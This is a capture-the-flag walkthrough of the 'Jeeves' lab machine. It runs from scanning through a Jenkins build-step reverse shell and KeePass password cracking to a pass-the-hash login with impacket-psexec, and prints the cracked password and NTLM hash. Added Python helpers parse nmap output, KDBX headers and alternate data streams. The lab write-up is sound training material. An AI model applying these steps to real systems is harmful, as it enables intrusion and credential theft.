Jeeves

# Solution

# Finding the vulnerability

nmap shows open ports 80, 135, 445, and 50000.
Video timestamp 0:10

```bash
nmap -Pn -p- --min-rate=1000 -T4 10.10.10.63 -vv -oN ports
```

We run -sCV on the open ports.

```bash
ls
ports=$(cat ports | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo $ports
```

```bash
nmap -p$ports 10.10.10.63 -sCV -oN version-basescripts
```
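The grep/cut pipeline above keeps every line of the -oN file that starts with a digit, which also sweeps in ports nmap lists as closed or filtered (it prints those individually when there are only a few). The following is an added example, not code from the writeup, that parses nmap normal output and keeps only ports whose STATE column is open. The sample output is constructed to resemble the scan in the writeup, with one closed and one filtered port added to show the difference.

```python
import re

# Constructed sample of nmap "normal" (-oN) output, shaped like the scan in
# the writeup but with a closed and a filtered port added. Not a real scan.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.94 scan initiated as: nmap -Pn -p- --min-rate=1000 -T4 10.10.10.63 -vv -oN ports
Nmap scan report for 10.10.10.63
Host is up, received user-set (0.020s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE    SERVICE       REASON
22/tcp    closed   ssh           reset ttl 127
80/tcp    open     http          syn-ack ttl 127
135/tcp   open     msrpc         syn-ack ttl 127
445/tcp   open     microsoft-ds  syn-ack ttl 127
50000/tcp open     ibm-db2       syn-ack ttl 127
8080/tcp  filtered http-proxy    no-response
# Nmap done at ...
"""

# One port line looks like "<port>/<proto> <state> <service> ..."; anything
# else (banner lines, "Not shown", "Discovered ...") is ignored.
PORT_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_port_lines(text):
    """Return (port, proto, state, service) for every port line in the output."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            rows.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return rows


def open_ports(text, proto="tcp"):
    """Only ports whose STATE column is exactly 'open', sorted and de-duplicated."""
    return sorted({port for port, pr, state, _ in parse_port_lines(text)
                   if pr == proto and state == "open"})


def ports_arg(text):
    """Comma-separated list suitable for nmap -p<list>, like the writeup's $ports."""
    return ",".join(str(p) for p in open_ports(text))


if __name__ == "__main__":
    print(ports_arg(SAMPLE_NMAP_OUTPUT))  # 80,135,445,50000
```

The naive grep would have produced 22,80,135,445,50000,8080 for this input; filtering on the state column gives the four ports the writeup actually found.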


We try to log in to SMB, but it requires a password.
Video timestamp 0:15

```bash
smbclient -N -L \\\\10.10.10.63\\
```


Port 50000 gives the 404 Not Found error listed with nmap.
Video timestamp 0:25


Port 80 also gives an error, this time as an image.
Video timestamp 0:32


We run ffuf and find a /askjeeves directory on port 50000 that’s running Jenkins.
Video timestamp 1:40

```bash
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://10.10.10.63:50000/FUZZ -recursion -recursion-depth 1 -o ffuf
```

# Foothold

We find an RCE exploit for Jenkins at Jenkins RCE Creating Modifying Project.
Video timestamp 2:19

  1. Create a New Item.

  2. Enter an item name, choose Freestyle project, and click OK.

  3. Scroll down to Build and add the Execute Windows batch command build step.

  4. Create a PowerShell #3 base64 encoded reverse shell at https://www.revshells.com/

  5. Paste the reverse shell into Command and click Apply.

  6. Start your listener with rlwrap:

     ```bash
     rlwrap -cAr nc -lvnp <your chosen port>
     ```

  7. Navigate to http://10.10.10.63:50000/askjeeves/job/<your job's name>/ and click Build Now. This gives us a shell as user kohsuke.

We get the user flag in c:\users\kohsuke\desktop.
Video timestamp 4:19

```bat
dir c:\users\
```

```bat
cd c:\users\kohsuke\desktop
dir
```


# Privilege Escalation

We look around and find a KeePass file in the c:\users\kohsuke\documents directory.
Video timestamp 4:28

```bat
cd ..\Documents
dir
```


We move the file over to our attack box by base64-encoding it in PowerShell.
Video timestamp 4:40

On Windows:

```powershell
[Convert]::ToBase64String((Get-Content -path "C:\users\kohsuke\documents\ceh.kdbx" -Encoding byte))
```

On our attack box:

```bash
echo "A9mimmf7S7UBAAMAAhAAMcHy5r9xQ1C+WAUhavxa/wMEA<snip>" | base64 -d > CEH.kdbx
```

We have CEH.kdbx on our local machine.

```bash
ls
```


We use kpcli to get the passwords.
Video timestamp 5:37

```bash
sudo apt update && sudo apt install kpcli
```

We need the CEH.kdbx master password.

```bash
kpcli
open CEH.kdbx
```

keepass2john helps us out.

```bash
keepass2john CEH.kdbx > CEH.kdbx-hash
```
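keepass2john can build a crackable hash from the database without the master password because the KDBX outer header is stored in the clear: signature, format version, cipher id, master seed, transform seed, transform rounds and IV all sit unencrypted at the start of the file. That is also what lets a defender recognise a KeePass database in a base64 blob that shows up in shell history or a proxy log, as the transfer above does. The following is an added example, not code from the writeup or from KeePass; it parses the KDBX 3.x outer header and runs on the first 44 base64 characters quoted above (the rest of the blob is snipped in the writeup), so only the fields that fit in those 33 bytes are reported. The field and cipher ids are the documented KDBX 3.x values; treating the truncated input as the writeup's file is an assumption.

```python
import base64
import struct
import uuid

# First 44 base64 characters of the blob quoted in the writeup (the remainder
# is snipped there); they decode to the first 33 bytes of the .kdbx file.
KDBX_B64_PREFIX = "A9mimmf7S7UBAAMAAhAAMcHy5r9xQ1C+WAUhavxa/wME"

SIG1 = 0x9AA2D903        # KeePass file signature (all formats)
SIG2_KDBX = 0xB54BFB67   # KDBX (KeePass 2.x database) signature

# Field ids of the KDBX 3.x outer header; every one is stored unencrypted.
FIELD_NAMES = {
    0: "EndOfHeader", 1: "Comment", 2: "CipherID", 3: "CompressionFlags",
    4: "MasterSeed", 5: "TransformSeed", 6: "TransformRounds",
    7: "EncryptionIV", 8: "ProtectedStreamKey", 9: "StreamStartBytes",
    10: "InnerRandomStreamID",
}
# Cipher UUIDs KeePass writes into the CipherID field.
CIPHER_NAMES = {
    uuid.UUID("31c1f2e6-bf71-4350-be58-05216afc5aff"): "AES-256-CBC",
    uuid.UUID("d6038a2b-8b6f-4cb5-a524-339a31dbb59a"): "ChaCha20",
}


def parse_kdbx_header(data):
    """Parse the unencrypted KDBX 3.x outer header from raw file bytes.

    Returns the format version plus every header field that is fully present.
    A truncated input stops at the first incomplete field instead of raising,
    so a partial capture can still be identified.
    """
    if len(data) < 12:
        raise ValueError("too short to be a KDBX file")
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", data, 0)
    if sig1 != SIG1 or sig2 != SIG2_KDBX:
        raise ValueError("not a KDBX file (bad signature)")
    if major != 3:
        raise ValueError(f"KDBX {major}.{minor} uses a different header layout")
    info = {"version": f"{major}.{minor}", "fields": {}, "complete": False}
    pos = 12
    while pos + 3 <= len(data):
        field_id, size = struct.unpack_from("<BH", data, pos)  # id, then uint16 length
        pos += 3
        if pos + size > len(data):
            break  # input ends in the middle of this field
        value = data[pos:pos + size]
        pos += size
        name = FIELD_NAMES.get(field_id, f"Unknown({field_id})")
        if field_id == 2 and size == 16:
            cipher = uuid.UUID(bytes=value)
            value = CIPHER_NAMES.get(cipher, cipher.hex)
        info["fields"][name] = value
        if field_id == 0:
            info["complete"] = True
            break
    return info


def identify_b64_blob(b64_text):
    """Decode a base64 blob (whitespace and line breaks ignored) and parse its header."""
    raw = base64.b64decode("".join(b64_text.split()))
    return parse_kdbx_header(raw)


if __name__ == "__main__":
    print(identify_b64_blob(KDBX_B64_PREFIX))
```

On the quoted prefix this reports a KDBX 3.1 database encrypted with AES-256-CBC and stops there, because the blob is cut off inside the CompressionFlags field; on the complete file the same loop walks through MasterSeed, TransformSeed and TransformRounds, which are exactly the values keepass2john copies into its hash line.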

Then we use john to get the master password.

```bash
john CEH.kdbx-hash --wordlist=/usr/share/wordlists/rockyou.txt
```

Now it’s time to grab the passwords from this CEH.kdbx file.

```bash
kpcli
open CEH.kdbx
```

After entering the moonshine1 password we find 7 password entries.

```
find .
```

We find a hash in entry 0.

```
show -f 0
```

We put the hash in a file for Pass The Hash attacks.

```bash
echo "aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00" > hashes
```


We use crackmapexec to test the hash on the SMB server. We find out the hash works for Administrator.
Video timestamp 7:17

```bash
crackmapexec smb 10.10.10.63 --local-auth -u Administrator -H hashes
```


We use impacket-psexec to get on the server as Administrator.
Video timestamp 7:32

```bash
impacket-psexec Administrator@10.10.10.63 -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
```


Instead of a root flag, we find hm.txt.
Video timestamp 7:51

```bat
cd c:\users\administrator\desktop
dir
```

The file says "The flag is elsewhere. Look deeper".

```bat
type hm.txt
```

Let’s look deeper into the hm.txt file, then. `dir /r` lists NTFS alternate data streams alongside the files that carry them.

```bat
dir /r
```


We read the root.txt stream with CMD or PowerShell.
Video timestamp 8:21

CMD:

```bat
more < hm.txt:root.txt:$DATA
```

PowerShell:

```powershell
powershell Get-Content hm.txt -stream root.txt
```
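Alternate data streams are invisible to a plain `dir`, which is what makes them a convenient place to stash a file, and `dir /r` is the quickest built-in way to surface them. The following is an added example, not code from the writeup, that runs over saved `dir /r` output and reports every non-default `$DATA` stream, so a listing collected from a suspect host can be triaged offline. The sample listing is constructed to resemble the Desktop directory in the writeup; its sizes, dates and the extra Zone.Identifier stream are made up. Zone.Identifier (the Mark-of-the-Web that browsers attach to downloads) is filtered out by default because it is present on most downloaded files and is not what this check is looking for.

```python
import re

# Constructed sample of "dir /r" output, shaped like the Desktop listing in
# the writeup; sizes, dates and the Zone.Identifier stream are invented.
SAMPLE_DIR_R = r"""
 Volume in drive C has no label.
 Volume Serial Number is 1234-ABCD

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
                                    26 Windows 10 Update Assistant.lnk:Zone.Identifier:$DATA
               2 File(s)            833 bytes
               2 Dir(s)  2,572,251,136 bytes free
"""

# A stream line carries no date/time: leading spaces, a size, then
# "<file name>:<stream name>:$DATA". Regular file lines start with a date.
STREAM_LINE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:\\]+):\$DATA\s*$")
DIR_LINE = re.compile(r"^\s*Directory of (.+?)\s*$")

# Streams that are expected on ordinary files and not worth flagging.
BENIGN_STREAMS = {"Zone.Identifier"}


def find_alternate_streams(dir_output, ignore_benign=True):
    """Return (directory, file, stream, size_bytes) for each non-default $DATA stream."""
    findings = []
    current_dir = None
    for line in dir_output.splitlines():
        d = DIR_LINE.match(line)
        if d:
            current_dir = d.group(1)  # "Directory of ..." header precedes its entries
            continue
        m = STREAM_LINE.match(line)
        if not m:
            continue
        size = int(m.group(1).replace(",", ""))
        fname, stream = m.group(2), m.group(3)
        if ignore_benign and stream in BENIGN_STREAMS:
            continue
        findings.append((current_dir, fname, stream, size))
    return findings


if __name__ == "__main__":
    for directory, fname, stream, size in find_alternate_streams(SAMPLE_DIR_R):
        print(f"{directory}\\{fname} has hidden stream '{stream}' ({size} bytes)")
```

Once a stream name is known, the `Get-Content -Stream` and `more < file:stream:$DATA` commands above read it; passing `ignore_benign=False` lists the Zone.Identifier streams too, which is occasionally useful for establishing where a file was downloaded from.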
